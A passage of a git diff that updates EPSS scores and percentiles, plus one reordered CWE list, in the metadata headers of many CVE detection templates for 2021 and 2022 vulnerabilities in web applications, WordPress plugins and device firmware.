epss-percentile: 0.49979 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index 1b0f9ee04d..d67b45538d 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46068 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35066 + epss-percentile: 0.35077 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 376d28112d..5263bbff5f 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46069 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35066 + epss-percentile: 0.35077 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index f98a144164..a51546e36c 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46071 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35066 + epss-percentile: 0.35077 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 5bfe0cf90a..3055864e17 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46072 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35066 + epss-percentile: 0.35077 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index f5d993fb6f..7b52aa4170 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46073 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35066 + epss-percentile: 0.35077 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index da2619fe29..fa4d8155ea 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-46107 cwe-id: CWE-918 epss-score: 0.01705 - epss-percentile: 0.86385 + epss-percentile: 0.86389 cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index c3cce023e7..4d0fe96864 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-46379 cwe-id: CWE-601 epss-score: 0.00245 - epss-percentile: 0.62317 + epss-percentile: 0.62345 cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 7e75960252..204ab50e65 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-46381 cwe-id: CWE-22 epss-score: 0.01734 - epss-percentile: 0.86486 + epss-percentile: 0.8649 cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index c491c02b37..9ca7df28c6 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46387 cwe-id: CWE-79 epss-score: 0.00628 - epss-percentile: 0.76695 + epss-percentile: 0.76714 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 54912ba36c..77d0b7cbf1 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46417 cwe-id: CWE-22 epss-score: 0.7169 - epss-percentile: 0.97714 + epss-percentile: 0.97715 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 07f38be4ae..d4bf978adf 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-46422 cwe-id: CWE-78 epss-score: 0.9524 - epss-percentile: 0.99113 + epss-percentile: 0.99114 cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 5fae9332bc..3da23216bc 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-46424 cwe-id: CWE-306 epss-score: 0.01677 - epss-percentile: 0.86281 + epss-percentile: 0.86285 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 34c61870fb..3cd333e8b8 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-46704 cwe-id: CWE-78 epss-score: 0.95016 - epss-percentile: 0.99067 + epss-percentile: 0.99068 cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 76748e9d6a..91d368a319 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0140 cwe-id: CWE-306 epss-score: 0.01105 - epss-percentile: 0.82871 + epss-percentile: 0.82882 cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index d89a226aef..05a6b844c8 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0147 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index 849547030e..e9d93270bf 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50057 + epss-percentile: 0.50079 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index b5bdea9e14..5d6b8a2a7a 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0149 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index df1e7be5b5..7e0354560c 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0150 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index d7dd2a7cf1..18b0a7b0f6 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-0165 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40998 + epss-percentile: 0.41022 cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 3bf74e2f6b..4ca525a6be 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0169 cwe-id: CWE-89 epss-score: 0.01077 - epss-percentile: 0.82667 + epss-percentile: 0.82679 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index debc02bd31..3df08c721e 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0189 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index e4c733ce94..67eff0244a 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0201 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index e90ab4ee37..85d5294977 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0206 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index dd57b7e9ed..7cb6c81003 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0208 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index efddd2fcf3..4aeb437aa6 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0212 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.36011 + epss-percentile: 0.36026 cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index 939145f848..5771640e36 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0218 cwe-id: CWE-79 epss-score: 0.03872 - epss-percentile: 0.9092 + epss-percentile: 0.90925 cpe: cpe:2.3:a:codemiq:wordpress_email_template_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 734a4b6faa..7a55a55c4b 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.00124 - epss-percentile: 0.46567 + epss-percentile: 0.46579 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 7042491a66..4ef8ed4740 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0228 cwe-id: CWE-89 epss-score: 0.04446 - epss-percentile: 0.91452 + epss-percentile: 0.91462 cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index 5bc1487830..1c9736431a 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0234 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 129c124643..bc64d11a44 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0271 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46224 + epss-score: 0.00106 + epss-percentile: 0.42969 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index ca922df242..f1b79d63d6 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0281 cwe-id: CWE-200 epss-score: 0.0051 - epss-percentile: 0.7396 + epss-percentile: 0.73987 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index babee29a6e..a99043f64f 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-0288 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index aa12a14cc4..7e07a63888 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-0342 cwe-id: CWE-287 epss-score: 0.25187 - epss-percentile: 0.96135 + epss-percentile: 0.96138 cpe: cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 3039462c8c..3b200fd87a 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0346 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40737 + epss-percentile: 0.40759 cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index e1e047a15d..88b5bd3a05 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0349 cwe-id: CWE-89 epss-score: 0.0339 - epss-percentile: 0.90351 + epss-percentile: 0.90356 cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 5ab8027863..11a9cd8691 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index cdfca1f891..c82546c9f0 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0381 cwe-id: CWE-79 epss-score: 0.00218 - epss-percentile: 0.5963 + epss-percentile: 0.59664 cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index ccf6429f77..52b535bd97 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0412 cwe-id: CWE-89 epss-score: 0.08711 - epss-percentile: 0.93826 + epss-percentile: 0.93832 cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 0d69e18dce..d2fe16eefd 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0415 cwe-id: CWE-434,CWE-20 epss-score: 0.1488 - epss-percentile: 0.95187 + epss-percentile: 0.95188 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 94e09ed2bc..7e730162d7 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0422 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 194a2bf124..a7ddc181db 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0432 cwe-id: CWE-1321 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 45b8f92b73..5b59631bca 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0434 cwe-id: CWE-89 epss-score: 0.1191 - epss-percentile: 0.94721 + epss-percentile: 0.94722 cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index 491f422b67..e6020d0c1f 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0437 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index c0487002d3..c3710e48cc 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0441 cwe-id: CWE-269,NVD-CWE-Other epss-score: 0.28628 - epss-percentile: 0.96325 + epss-percentile: 0.96328 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index fb5b78c073..afdd967739 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2022-0482 - cwe-id: CWE-359,CWE-863 + cwe-id: CWE-863,CWE-359 epss-score: 0.06254 - epss-percentile: 0.92807 + epss-percentile: 0.92812 cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index e91b00503c..92b1941057 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0533 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4099 + epss-percentile: 0.41014 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 2e980e0fdd..61c77eab0a 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0535 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35056 + epss-percentile: 0.35067 cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index acc8ca8dbc..6426712fff 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0540 cwe-id: CWE-287 epss-score: 0.15528 - epss-percentile: 0.95301 + epss-percentile: 0.953 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index 861f51362e..0bbdee439a 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0591 cwe-id: CWE-918 epss-score: 0.02876 - epss-percentile: 0.8962 + epss-percentile: 0.89626 cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index 71f33b5bd1..ddbc9d4314 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0594 cwe-id: CWE-863 epss-score: 0.00257 - epss-percentile: 0.63315 + epss-percentile: 0.63348 cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index 37258ada4f..c93e0fe577 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0595 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41344 + epss-percentile: 0.41368 cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 3c64e24359..31f7d6de90 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0597 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.44908 + epss-percentile: 0.44929 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index e9d8ad9bd2..1d4e2f14e0 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0599 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 470ff319bf..da544a0512 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0651 cwe-id: CWE-89 epss-score: 0.34697 - epss-percentile: 0.96629 + epss-percentile: 0.9663 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 498909b25a..7525042cac 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0653 cwe-id: CWE-79 epss-score: 0.00206 - epss-percentile: 0.58383 + epss-percentile: 0.58411 cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 0b00e4a899..1722061d50 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-0656 cwe-id: CWE-552 epss-score: 0.00651 - epss-percentile: 0.77137 + epss-percentile: 0.77158 cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index df5bb769e7..8edd33180e 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -17,7 +17,7 @@ info: cve-id: 